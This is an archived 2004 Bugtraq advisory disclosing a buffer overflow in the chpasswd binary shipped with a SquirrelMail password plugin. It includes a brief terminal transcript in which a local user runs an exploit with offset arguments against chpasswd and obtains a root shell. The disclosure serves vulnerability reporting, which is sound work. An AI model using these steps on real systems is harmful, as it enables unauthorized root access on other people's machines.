[34552] in bugtraq

home help back first fref pref prev next nref lref last post

Squirrelmail Chpasswod bof

daemon@ATHENA.MIT.EDU (Matias Neiff)
Sat Apr 17 15:28:00 2004

From: Matias Neiff <matias@neiff.com.ar>
To: bugtraq@securityfocus.com
Date: Sat, 17 Apr 2004 04:20:26 -0300
MIME-Version: 1.0
Content-Type: Text/Plain;
  charset="us-ascii"
Content-Description: clearsigned data
Content-Disposition: inline
Message-Id: <200404170420.32857.matias@neiff.com.ar>
Content-Transfer-Encoding: 8bit

Hi all

There is a boffer over flow in the chpasswd binary, distributed with the 
plugin. This allow to local's user to execute commands as a root.
---:::Prott:::---
root@orco:/mnt/hosting/hack/bof# su webmaster
webmaster@orco:/mnt/hosting/hack/bof$ ./exploit 166 5555 99999
Using address: 0xbfffe325
bash-2.05b$ ./chpasswd $RET asdf asdf
The new password is equal to old password. Choose another password.
sh-2.05b# id
uid=0(root) gid=3(sys) groups=500(webmaster)
sh-2.05b#
---:::end:::---

Bye all


home help back first fref pref prev next nref lref last post